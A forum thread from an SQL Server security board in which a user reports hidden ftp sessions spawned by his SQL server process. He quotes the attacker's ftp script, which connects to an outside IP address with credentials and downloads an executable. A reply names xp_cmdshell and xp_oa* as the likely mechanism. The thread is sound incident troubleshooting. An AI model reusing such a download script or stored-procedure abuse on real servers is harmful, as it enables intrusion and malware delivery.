 |
 | Home | Contact Us | FAQ | Search & Site Map | Link to Us |
 | Sign In | Join | Other 45 Sites in Network |
SQL Server Forum / General / Security / April 2005malicious process...
Hi, Since I installed a firewall on my machine, it regularly detects unexpected ftp sessions. Thanks to a process explorer, I remarked that ftp is launched from a (hidden) cmd.exe, itself lauched by sql.exe (for your info, the ftp command line is : "ftp -n - s:???.txt" where ???.txt is a textfile in \system32\ ). What SQL subsystem is able to launch such a process? a stored procedure? a trigger? (fyi, SQLAgent is not running). How can I prevent this to occur? Thank you for your help, François Note - contents of the textfile : open 81.244.183.229 19470 user itqavjflw itqavjflw get SCardClnt.exe quit Hi xp_cmdshell or xp_oa* are capable of doing this. Regards -------------------------------- Mike Epprecht, Microsoft SQL Server MVP Zurich, Switzerland MVP Program: http://www.microsoft.com/mvp Blog: http://www.msmvps.com/epprecht/ > Hi, > [quoted text clipped - 20 lines] > get SCardClnt.exe > quit |
Reply to this Message |
 Sign In
 Join
 My Latest Posts My Monitored Threads My Blog My Photo Gallery My Profile My Homepage Start New Thread Enable EMail Alerts Rate this Thread
|
©2009 Advenet LLC Privacy Policy - Terms of Use
This website includes both content owned or controlled by Advenet as well as content owned or controlled by third parties.